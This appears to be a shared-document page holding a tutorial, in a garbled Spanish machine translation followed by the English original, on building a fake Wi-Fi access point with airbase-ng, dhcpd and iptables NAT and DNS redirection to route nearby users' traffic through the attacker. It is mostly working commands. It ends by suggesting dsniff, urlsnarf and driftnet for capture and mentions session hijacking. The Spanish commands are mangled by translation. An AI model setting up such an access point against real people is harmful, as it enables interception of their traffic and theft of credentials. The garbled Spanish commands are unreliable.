19
AP falsos utilizando airbase-ng Aquí vamos a echar un vistazo a la creación de un punto de acceso falso y el tráfico de Internet pasa a través de nuestras ap falsos. Tuve muchos problemas con esto y en realidad sólo fue capaz de completar con la ayuda deGitsnik & Nick el griego en los foros exploit remoto .. Ayuda impresionante hay chicos ;) Los pasos a seguir son básicamente; Configurar dhcpd.conf Inicie los ap falsos con airbase-ng Configurar las tablas IP para pasar a través de Internet para alojar Capture / Monitor de tráfico de la red con la herramienta de elección En este caso, mi sistema de prueba es el siguiente: > Uso de back | track4 pre última > Uso dongle WiFi para crear una conexión a Internet en wlan1 (a través de puerta de enlace 192.168.1.1) > Uso de mi tarjeta de netbook inalámbrica (Atheros) para crear el falso AP En primer lugar crear / configurar el archivo dhcpd.conf para su uso posterior; nano / etc/dhcpd3/dhcpd.conf ddns-update-style ad- hoc; default-lease-time 600; max-lease-time 7200;subred 192.168.2.128 máscara de red 255.255.255.128 { option subnet-mask 255.255.255.128; opción broadcast-address 192.168.2.255; option routers 192.168.2.129; option domain-name-servers 4.2.2.2; rango 192.168.2.130 192.168.2.140; } Ctrl X - > y -> Enter para guardar el archivo.

AP Falsos Utilizando Airbase

  • Upload
    larata

  • View
    5

  • Download
    1

Embed Size (px)

DESCRIPTION

Ap falsos

Citation preview

Page 1: AP Falsos Utilizando Airbase

AP falsos utilizando airbase-ngAquí vamos a echar un vistazo a la creación de un punto de acceso falso y el tráfico de Internet pasa a través de nuestras ap falsos. Tuve muchos problemas con esto y en realidad sólo fue capaz de completar con la ayuda deGitsnik & Nick el griego en los foros exploit remoto .. Ayuda impresionante hay chicos ;) Los pasos a seguir son básicamente;

Configurar dhcpd.conf Inicie los ap falsos con airbase-ng Configurar las tablas IP para pasar a través de Internet para alojar Capture / Monitor de tráfico de la red con la herramienta de elección

En este caso, mi sistema de prueba es el siguiente: > Uso de back | track4 pre última > Uso dongle WiFi para crear una conexión a Internet en wlan1 (a través de puerta de enlace 192.168.1.1) > Uso de mi tarjeta de netbook inalámbrica (Atheros) para crear el falso AP En primer lugar crear / configurar el archivo dhcpd.conf para su uso posterior; nano / etc/dhcpd3/dhcpd.conf ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200;subred 192.168.2.128 máscara de red 255.255.255.128 { option subnet-mask 255.255.255.128; opción broadcast-address 192.168.2.255; option routers 192.168.2.129; option domain-name-servers 4.2.2.2; rango 192.168.2.130 192.168.2.140; } Ctrl X - > y -> Enter para guardar el archivo.

Page 2: AP Falsos Utilizando Airbase

A continuación, para iniciar el ap falso con base aérea, la interfaz tiene que estar en modo monitor;

airmon-ngairmon-ng start wlan0

Page 3: AP Falsos Utilizando Airbase

airbase-ng-e "TEST_AP"-c 9 mon0Esto creará una interfaz simple toque, el at0, sin encriptación, en el canal 9 y con el TEST_AP essid.

Page 4: AP Falsos Utilizando Airbase

En este caso, yo ya tenía una conexión a Internet en funcionamiento en wlan1, por lo tanto, los mensajes de advertencia, sin embargo esto no tuvo consecuencias aún

Page 5: AP Falsos Utilizando Airbase

más. Luego, lleve el dispositivo de red y asignar subred y la puerta;

ifconfig at0ifconfig at0 192.168.2.129 netmask 255.255.255.128route add-net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129

A continuación, iniciar DHCP, estaba recibiendo errores en la configuración de dhcpd, aquí es donde la ayuda llegó en :) necesaria para dar privilages adicionales para el dhcpd.

mkdir-p / var / run / dhcpd && chown dhcpd: dhcpd / var / run / dhcpd

Luego de señalar el comando en el archivo dhcpd.conf alternativa y la alternativa. Pid archivodhcpd3-cf / etc/dhcp3/dhcpd.conf-pf / var / run / dhcpd / dhcpd.pid at0

Page 6: AP Falsos Utilizando Airbase

Luego de configurar el iptables para enrutar el tráfico a través de la interfaz del grifo a la conexión a Internet (conexión a internet siendo el wlan1 está conectado a más de mi 192.168.1.1 gateway). iptables - flush iptables - flush tabla nat - iptables - cadena delete- iptables - tabla nat - delete-chain echo 1> / proc/sys/net/ipv4/ip_forward iptables - tabla nat - append POSTROUTING - out-interface wlan1-j MASQUERADEiptables - append FORWARD - en interfaz at0-j ACCEPT iptables-t nat-A PREROUTING-p udp - dport 53-j DNAT - to 192.168.1.1

Page 7: AP Falsos Utilizando Airbase

Ahora, básicamente, tiene un punto de acceso falso que la gente puede conectarse y navegar por internet .. todo a través de su conexión.

Page 9: AP Falsos Utilizando Airbase

Obviamente, esto puede ser abusado en cualquier número de formas, todo el tráfico se pueden capturar y analizar; dsniff se puede ejecutar en él junto con urlsnarf, etc con redes de deriva, las sesiones pueden ser secuestrados en tiempo real .. Así que viene a demostrar que debe ser cuidado con los puntos de acceso libre .. 

PU BL IC AD O P O R   C INT A   EN   1 4 : 59  

Page 10: AP Falsos Utilizando Airbase

Versión original

Fake AP using airbase-ngHere we will have a look at creating a fake AP and passing internet traffic through our fake ap.

I had a lot of trouble with this and only really was able to complete it with the help of Gitsnik & Nick The Greek on the Remote Exploit forums.. awesome help there guys ;)

The steps involved are basically ;

Configure dhcpd.conf Start the fake ap with airbase-ng Configure IP tables to pass through to host internet Capture / Monitor network traffic with tool of choice

In this case my test setup is as follows ;

> Using back|track4 pre final> Using WiFi dongle to create a connection to internet on wlan1 (through gateway 192.168.1.1)> Using my netbook wireless card (Atheros) to create the fake ap

First to create/configure the dhcpd.conf file for later use ;

nano /etc/dhcp3/dhcpd.conf

ddns-update-style ad-hoc;default-lease-time 600;max-lease-time 7200;subnet 192.168.2.128 netmask 255.255.255.128 {option subnet-mask 255.255.255.128;option broadcast-address 192.168.2.255;option routers 192.168.2.129;option domain-name-servers 4.2.2.2;

Page 11: AP Falsos Utilizando Airbase

range 192.168.2.130 192.168.2.140;}

Ctrl X --> y --> Enter  to save the file.

Then to start the fake ap with airbase, the interface needs to be in monitor mode ;

airmon-ngairmon-ng start wlan0airbase-ng -e "TEST_AP" -c 9 mon0This will create a simple tap interface, on at0, with no encryption, on channel 9 and with the essid TEST_AP.

Page 13: AP Falsos Utilizando Airbase

In this case I already had an internet connection up and running on wlan1, hence the warning messages, however this was of no further consequence.

Then bring the interface up and assign subnet and gateway;ifconfig at0 upifconfig at0 192.168.2.129 netmask 255.255.255.128route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129

Then start DHCP, I was getting errors on the dhcpd settings, this is where the help came in :)

Needed to give further privilages to the dhcpd.mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd

Then to point the command to the alternative dhcpd.conf file and the alternative .pid filedhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0

Page 14: AP Falsos Utilizando Airbase

Then to setup the iptables to route the traffic through the tap interface to the internet connection (internet connection being the one wlan1 is connected to over my 192.168.1.1 gateway). 

iptables --flushiptables --table nat --flushiptables --delete-chainiptables --table nat --delete-chainecho 1 > /proc/sys/net/ipv4/ip_forwardiptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADEiptables --append FORWARD --in-interface at0 -j ACCEPTiptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1

Page 15: AP Falsos Utilizando Airbase

Now basically you have a fake ap which people can connect to and browse the internet.. all through your connection.

Page 18: AP Falsos Utilizando Airbase

Obviously this can be abused in any number of ways, all traffic can be captured and analyzed;dsniff could be run on it together with urlsnarf, driftnet etc., sessions could be hijacked in real time..

So goes to show that you should be wary of free access points..

PO S TE D B Y   T APE   AT   1 4 : 59